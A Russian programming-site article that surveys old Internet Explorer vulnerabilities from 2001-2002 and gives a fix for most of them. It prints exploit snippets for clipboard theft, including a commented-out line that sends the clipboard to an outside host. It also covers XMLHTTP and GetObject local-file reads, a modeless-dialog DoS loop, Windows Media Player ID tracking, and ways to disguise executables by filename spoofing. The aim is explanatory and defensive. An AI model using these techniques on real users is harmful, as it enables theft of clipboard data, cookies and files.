Навигация
Главная
Поиск
Форум
FAQ's
Ссылки
Карта сайта
Чат программистов

Статьи
-Delphi
-C/C++
-Turbo Pascal
-Assembler
-Java/JS
-PHP
-Perl
-DHTML
-Prolog
-GPSS
-Сайтостроительство
-CMS: PHP Fusion
-Инвестирование

Файлы
-Для программистов
-Компонеты для Delphi
-Исходники на Delphi
-Исходники на C/C++
-Книги по Delphi
-Книги по С/С++
-Книги по JAVA/JS
-Книги по Basic/VB/.NET
-Книги по PHP/MySQL
-Книги по Assembler
-PHP Fusion MOD'ы
-by Kest
Professional Download System
Реклама
Услуги

Автоматическое добавление статей на сайты на Wordpress, Joomla, DLE
Заказать продвижение сайта
Программа для рисования блок-схем
Инженерный калькулятор онлайн
Таблица сложения онлайн
Популярные статьи
OpenGL и Delphi... 65535
Форум на вашем ... 65535
HACK F.A.Q 65535
Бип из системно... 65535
Гостевая книга ... 65535
Invision Power ... 65535
Содержание сайт... 65535
Организация зап... 65535
Вызов хранимых ... 65535
Программируемая... 65535
Эмулятор микроп... 65535
Подключение Mic... 65535
Создание потоко... 65535
Приложение «Про... 65535
Оператор выбора... 65535
Модуль Forms 62798
Создание отчето... 62779
ТЕХНОЛОГИИ ДОСТ... 59322
Пример работы с... 58045
Имитационное мо... 54708
Реклама
Сейчас на сайте
Гостей: 11
На сайте нет зарегистрированных пользователей

Пользователей: 13,071
новичок: virtualight
Новости
Реклама
Выполняем курсовые и лабораторные по разным языкам программирования
Подробнее - курсовые и лабораторные на заказ
Delphi, Turbo Pascal, Assembler, C, C++, C#, Visual Basic, Java, GPSS, Prolog, 3D MAX, Компас 3D
Заказать программу для Windows Mobile, Symbian

Обработка задач на ЭВМ на GPSS + Пояснительная записка
Моделирование работы обрабатывающего участка цеха в GPSS
Файл записей с выводом обратного заголовка на Turbo Pascal

Реклама



Подписывайся на YouTube канал о программировании, что бы не пропустить новые видео!

ПОДПИСЫВАЙСЯ на канал о программировании
Обзор уязвимостей Internet Explorer
Похищение содержимого буфера обмена
Описание: Начиная с пятой версии имеется возможность считывать и записывать буфер обмена из скрипта, по умолчанию, и без предупреждения. Это может быть полезно для веб-приложений, но может быть использовано злоумышленником для похищения буфера обмена.
function checkClip() { try { var newStr =
clipboardData.getData("Text"); } catch(e) { clearInterval(clipInt);
alert("Couldn't gain access
to the clipboard contents"); } if (clipStr != newStr)
{ // These commented-out lines would send the clipboard
contents. // xmlhttp.open("GET", "http://my.site.com/mysсript.asp",
false); // xmlhttp.send(newStr); alert("This sсript
could now have sent...\n\n" + newStr + "\n\n...to
me!"); clipStr = newStr; } }
Образец применения.
Решение: Измените значение опции Tools > Internet Options > Security > Select a security zone > Custom Level > sсripting > Allow paste operations via sсript.
Автор: Том Глайдер. 12 января 2001.
Подробности об автоматическом запуске программ Об этой уязвимости мы коротко рассказывали ранее, в «Сводке по уязвимостям Internet Explorer 5.0, 5.5, 6.0» под заголовком «Подделка расширения файла». Джоуко Пыннонен, открывший эту уязвимость, опубликовал подробности. Трюк оказался простым — надо просто добавить символ с ASCII-кодом 0 в имя файла. Веб-сервер злоумышленника может установить через заголовок Content-disposition такое имя файла, как README.TXT%00PROG.EXE. Если файл пересылается сервером, как attachment (речь о параметре заголовка Content-disposition, а не приложенном к письму файле), то IE отобразит в диалоге скачивания файла только README.TXT (если не установлена заплатка). Видимо, %00 декодируется, и функции отображения строк трактуют символ, как конец null-terminated строки. А если пользователь нажмёт кнопку «Открыть», то будет использовано полное имя файла и программа запустится.
Если в заголовке Content-disposition вместо attachment написать inline, и правильно выбрать MIME-тип, то браузер скачает и запустит программу без всяких диалогов и предупреждений. MIME-тип может быть установлен через заголовок Content-type. MIME-типы, вызывающие автоматическое открытие файла различаются от версии к версии. Например в IE6 это text/css, а в IE5 audio/midi.
Решение: заплатка от 13 декабря 2001 года.
Подмена расширения файла в Windows Explorer («Проводник») Назовите любой exe-файл «file.html .exe». Используйте символ ASCII с кодом 255 (FF) вместо пробелов. Посмотрите на файл в Windows Explorer — всё, вы увидите только file.html. .exe будет на другой строке... Эээ... Это сложно объяснить, поиграйтесь с эитм и вы сами всё поймёте. Я уверен, что вы можете таким же образом подменить имя файла в Internet Explorer. Также я экспериментировал с именами файлов вроде www.something.com — они выглядят, как интернет-адреса, но на самом деле исполняемые файлы.
Автор: Том Миклович. 15 января 2001.
SuperCookies, обходящие настройки обычных cookie и P3P Описание: Есть проблема с приватностью в Internet Explorer. Она возникла из-за ошибки разработки Windows Media Player (WMP). Используя простой javаsсript веб-сайт может захватить уникальный номер WMP, принадлежащий посетителю сайта. Номер может быть использован как cookie для отслеживания путей пользователя по интернету. Этот ID является SuperCookie, поскольку он может быть использован сайтами для обхода всех средств защиты приватности, добавленных Microsoft в IE 6, который сейчас поставляется со всеми версиями Windows XP. SuperCookies также работают во всех предыдущих версиях IE и Windows. Эксплоит:



alert(document.WMP.ClientID);


Пример использования SuperCookie.

Проблема с функцией GetObject()
Уязвимые версии: 5.5, 6.0.
Описание: Забавная уязвимости вида directory transversal, позволяет убрать из URL протокол и читать локальные файлы. a=GetObject("http://"+lоcation.host+"/../../../../../../test.txt","htmlfile"); Решение: Отключить Active sсripting и никогда не включать. Лучше вообще не использовать Internet Explorer в опасных окружениях, к каким принадлежит интернет.
Автор: Георгий Гунинский. 01 января 2002.
Дополнение от the Pull
Есть ещё кое-что. Я нашёл способ получать информацию о местоположении некоторых файлов. Вот стандартный адрес index.dat: file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/../ Local%20Settings/ Temporary%20Internet%20Files/ Content.IE5/index.dat (Пробелы из адреса необходимо убрать. Таких адресов существует много, их использование, правда, может быть неодинаково успешным.)
Код ниже использует этот адрес, показывая полный путь к файлу во всплывающем окне. setTimeout("alert (funObject2.document.body.innerHTML)",500);')" Автор: the Pull. 2 января 2001.
Возможность узнать наличие файла в системе
Описание: Я обнаружил, что вы можете запросить систему о наличии любого файла, если знаете путь к нему. Вот скрипт: Автор: Том Милкович. 3 января 2001.
Локальный DoS с использованием немодальных всплывающих окон
Описание: В Internet Explorer 6 (и, возможно, 5.0) есть баг, который позволяет javаsсript вызвать огромное количество немодальных диалогов, содержащих страницу, вызвавшую их. Окна остаются после уничтожения процесса iexplore, продолжая нагружать процессор. Эксплоит: function exploit() { while(1) { showModelessDialog("exploit.html"); } Решение: Отключить javаsсript.
Автор: Лэнс Хитчкок мл. 6 января 2001.
Доступ к локальным файлам через компонент Microsoft.XMLHTTP
В компоненте Microsoft.XMLHTTP, поставляемом вместе с шестой версией Internet Explorer присутствует ошибка — компонент неправильно обрабатывает HTTP-редиректы на локальные файлы. Чтобы эксплоит работал необходимо знать имя файла.
Уязвимые программные продукты:
IE 6 / Windows 98
IE 6 / Windows XP
IE 6 / Windows 2000 (Service Pack 2)
Эксплоит (отображает содержимое файла C:\jelmer.txt):

function exploit() { // open the file on the users
harddisk using a http redirect var xmlhttp = new
ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt",
false); xmlhttp.Send(); alert(xmlhttp.responseText); }



Автор эксплоита: jelmer.
Подделка расширения файла
Администратор сервера имеет возможность назвать исполняемый файл README.TXT, index.html или sample.wav. Если пользователь выберет «открыть файл из текущего места» (open the file from its current lоcation), то приложение запуститься без предупреждений. Даже, если скачивание обычного .EXE с сервера вызывает окно с предупреждением. У пользователя нету возможности определить является ли файл программой, а не текстом, HTML или другим безопасным типом файлов.
Уязвимость открыта Jouko Pynnonen.
Уязвимые программные продукты:
IE 5.0
IE 5.5
IE 6.0
Opera 5.12
Пример: http://www.geilerserver.de/text.txt.
Предлагается открыть файл, в случае положительного ответа запускается программа (калькулятор).
Чтобы не подвергаться опасности установите кумулятивный патч Q313675 (MS Security Bulletin MS01-058). Было замечено, что патч невозможно установить через Windows Update, только вручную.
ПОХИЩЕНИЕ COOKIES, ЧТЕНИЕ ФАЙЛОВ С ДИСКА
Просто используя метод javаsсript document.open и не используя document.close можно: похищать cookies; читать локальные файлы, обрабатываемые (parsable) Internet Explorer (HTML, если быть точном); и подменять сайты.
Эксплоиты прилагаются (см. ниже). cookieStealing.html открывает Yahoo.com и похищает cookie. fileReading.html открывает и читает файл C:\test.txt. SiteSpoofing.html скрывает (на Windows 2000) или подменяет (на Windows 98) настоящий адрес документа.
Уязвимые платформы:
IE 6.0.2600.0000, Windows 2000 с установленными Q312461, Q240308, Q313675
IE 6.0.2600.0000, Windows 98 с установленным Q313675
IE 5.5, Windows 2000 SP2
Уязвимость обнаружена группой the Pull. Заплатка для устранения этой уязвимости пока не выпущена.
Как включить Пятый уровень безопасности в ie 6.0
Вообще пятый уровень всегда скрыт, т.к. обычным пользователям это не нужно. Но если Вы не обычный пользователь и Вам нужен уровень безопастности выше стандартного максимального, то тогда зайдите в редактор реестра и найдите:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettingsones "Flags"=dword: 0X00000021 (33) ---default
И надо заменить опцию на
"Flags"=dword: 0X00000001 (1)
После этого перегружайтесь и - все!
Опубликовал Kest October 26 2008 16:40:55 · 0 Комментариев · 7073 Прочтений · Для печати

• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •


Комментарии
Нет комментариев.
Добавить комментарий
Имя:



smiley smiley smiley smiley smiley smiley smiley smiley smiley
Запретить смайлики в комментариях

Введите проверочный код:* =
Рейтинги
Рейтинг доступен только для пользователей.

Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.

Нет данных для оценки.
Гость
Имя

Пароль



Вы не зарегистрированны?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Поделиться ссылкой
Фолловь меня в Твиттере! • Смотрите канал о путешествияхКак приготовить мидии в тайланде?
Загрузки
Новые загрузки
iChat v.7.0 Final...
iComm v.6.1 - выв...
Visual Studio 200...
CodeGear RAD Stud...
Шаблон для новост...

Случайные загрузки
SODA [Исходник на...
Dnavigator
XPmenu
Система баннеро-о...
AUTOWEB
Род Стивенс. Delp...
Электронный магаз...
TsHintManager
Профессиональное ...
ScrollCredit
Comdrv
Советы от Даниилы...
45 уроков по дельфи
Delphi. Учимся на...
SUIPack
Задача о 8ми ладьях
Delphi World 6.0
Использование Lis...
Основы программир...
Просмотр коммент...

Топ загрузок
Приложение Клие... 100421
Delphi 7 Enterp... 84916
Converter AMR<-... 20061
GPSS World Stud... 11952
Borland C++Buil... 11404
Borland Delphi ... 8368
Turbo Pascal fo... 7007
Visual Studio 2... 4984
Калькулятор [Ис... 4622
FreeSMS v1.3.1 3529
Случайные статьи
Напряжение сигнала...
Печать изображения...
Агрегированные кон...
Обозначения
Есть несколько ста...
Маршрутизатор обра...
Вычисление арифмет...
Идея «витала в воз...
get(X)
Службы мета катало...
Алгоритм перезагру...
Применение вычисли...
Процесс кипения
открытый и закрыты...
File not open for ...
Драйвер seg_vn
Использование функ...
Бесплатные игровые...
Новостные сайты
удаленного офиса с...
LINITIAL (ИНИЦИАЛИ...
Работа с директори...
Если столбец sever...
Буферизация
Если ГВСканал связ...
Статистика



Друзья сайта
Программы, игры


Полезно
В какую объединенную сеть входит классовая сеть? Суммирование маршрутов Занимают ли таблицы память маршрутизатора?